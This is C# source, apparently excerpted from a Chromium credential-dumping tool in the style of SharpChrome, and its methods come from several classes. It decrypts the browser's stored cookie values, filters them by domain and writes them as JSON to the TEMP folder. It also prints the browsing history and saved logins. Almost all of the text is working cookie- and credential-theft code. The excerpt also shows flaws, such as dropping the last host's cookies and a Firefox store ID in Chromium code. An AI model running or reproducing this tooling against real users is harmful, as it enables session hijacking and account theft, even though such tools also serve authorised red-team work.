public HistoricUrl(DataRow row, HostCookies[] cookies)
{
Url = row["url"].ToString();
Title = row["title"].ToString();
int.TryParse(row["visit_count"].ToString(), out VisitCount);
Cookies = HostCookies.FilterHostCookies(cookies, Url);
}
public static HostCookies FilterHostCookies(HostCookies[] hostCookies, string url)
{
HostCookies results = new HostCookies();
if (hostCookies == null)
{
return(results);
}
if (url == "" || url == null || url == string.Empty)
{
return(results);
}
List <String> hostPermutations = new List <String>();
// First retrieve the domain from the url
string domain = url;
// determine if url or raw domain name
if (domain.IndexOf('/') != -1)
{
domain = domain.Split('/')[2];
}
results.HostName = domain;
string[] domainParts = domain.Split('.');
for (int i = 0; i < domainParts.Length; i++)
{
if ((domainParts.Length - i) < 2)
{
// We've reached the TLD. Break!
break;
}
string[] subDomainParts = new string[domainParts.Length - i];
Array.Copy(domainParts, i, subDomainParts, 0, subDomainParts.Length);
string subDomain = String.Join(".", subDomainParts);
hostPermutations.Add(subDomain);
hostPermutations.Add("." + subDomain);
}
List <Cookie> cookies = new List <Cookie>();
foreach (string sub in hostPermutations)
{
// For each permutation
foreach (HostCookies hostInstance in hostCookies)
{
// Determine if the hostname matches the subdomain perm
if (hostInstance.HostName.ToLower() == sub.ToLower())
{
// If it does, cycle through
foreach (Cookie cookieInstance in hostInstance.Cookies)
{
// No dupes
if (!cookies.Contains(cookieInstance))
{
cookies.Add(cookieInstance);
}
}
}
}
}
results.Cookies = cookies.ToArray();
return(results);
}
static void ExtractData(string path, string browser)
{
ChromiumCredentialManager chromeManager = new ChromiumCredentialManager(path);
// Main loop, path parsing and high integrity check taken from GhostPack/SeatBelt
string[] domainArray = domains.ToArray();
try
{
if (getCookies)
{
var cookies = chromeManager.GetCookies();
if (domainArray != null && domainArray.Length > 0)
{
foreach (var domain in domainArray)
{
var subCookies = HostCookies.FilterHostCookies(cookies, domain);
subCookies.Print();
}
}
else
{
string totalResults = "";
foreach (var cookie in cookies)
{
string jsonArray = cookie.ToJSON();
string jsonItems = jsonArray.Trim(new char[] { '[', ']', '\n' });
totalResults += jsonItems + ",\n";
// cookie.Print();
}
totalResults = totalResults.Trim(new char[] { ',', '\n' });
totalResults = "[" + totalResults + "]";
string filePath = Environment.GetEnvironmentVariable("TEMP") + string.Format("\\{0}-cookies.json", browser.ToLower().Replace(" ", "-"));
try
{
File.WriteAllText(filePath, totalResults);
Console.WriteLine("\n[*] All cookies written to {0}", filePath);
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception occurred while writing cookies to file: {0}\n{1}", ex.Message, ex.StackTrace);
}
}
}
if (getHistory)
{
var history = chromeManager.GetHistory();
foreach (var item in history)
{
item.Print();
}
}
if (getLogins)
{
var logins = chromeManager.GetSavedLogins();
foreach (var login in logins)
{
login.Print();
}
}
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception: {0}\n\n{1}", ex.Message, ex.StackTrace);
}
}
private HostCookies[] ExtractCookiesFromSQLQuery(DataTable query)
{
List <Cookie> cookies = new List <Cookie>();
List <HostCookies> hostCookies = new List <HostCookies>();
HostCookies hostInstance = null;
string lastHostKey = "";
foreach (DataRow row in query.Rows)
{
if (row == null)
{
continue;
}
if (row["host_key"].GetType() != typeof(System.DBNull) && lastHostKey != (string)row["host_key"])
{
lastHostKey = (string)row["host_key"];
if (hostInstance != null)
{
hostInstance.Cookies = cookies.ToArray();
hostCookies.Add(hostInstance);
}
hostInstance = new HostCookies();
hostInstance.HostName = lastHostKey;
cookies = new List <Cookie>();
}
Cookie cookie = new Cookie();
cookie.Domain = row["host_key"].ToString();
long expDate;
Int64.TryParse(row["expires_utc"].ToString(), out expDate);
// https://github.com/djhohnstein/SharpChrome/issues/1
if ((expDate / 1000000.000000000000) - 11644473600 > 0)
{
cookie.ExpirationDate = (expDate / 1000000.000000000000000) - 11644473600;
}
cookie.HostOnly = cookie.Domain[0] == '.' ? false : true; // I'm not sure this is stored in the cookie store and seems to be always false
if (row["is_httponly"].ToString() == "1")
{
cookie.HttpOnly = true;
}
else
{
cookie.HttpOnly = false;
}
cookie.Name = row["name"].ToString();
cookie.Path = row["path"].ToString();
// cookie.SameSite = "no_restriction"; // Not sure if this is the same as firstpartyonly
if (row["is_secure"].ToString() == "1")
{
cookie.Secure = true;
}
else
{
cookie.Secure = false;
}
cookie.Session = row["is_persistent"].ToString() == "0" ? true : false; // Unsure, this seems to be false always
//cookie.StoreId = "0"; // Static
//cookie.StoreId = null;
cookie.StoreId = "firefox-default";
cookie.SetSameSiteCookie(row["sameSite"].ToString());
byte[] cookieValue = Convert.FromBase64String(row["encrypted_value"].ToString());
cookieValue = DecryptBlob(cookieValue);
if (cookieValue != null)
{
cookie.Value = System.Text.Encoding.UTF8.GetString(cookieValue);
}
else
{
cookie.Value = "";
}
if (cookie != null)
{
cookies.Add(cookie);
}
}
return(hostCookies.ToArray());
}
